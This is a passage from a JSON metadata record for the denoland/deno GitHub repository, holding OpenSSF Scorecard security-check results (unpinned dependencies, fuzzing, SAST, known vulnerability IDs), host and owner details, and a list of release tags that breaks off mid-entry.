not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T1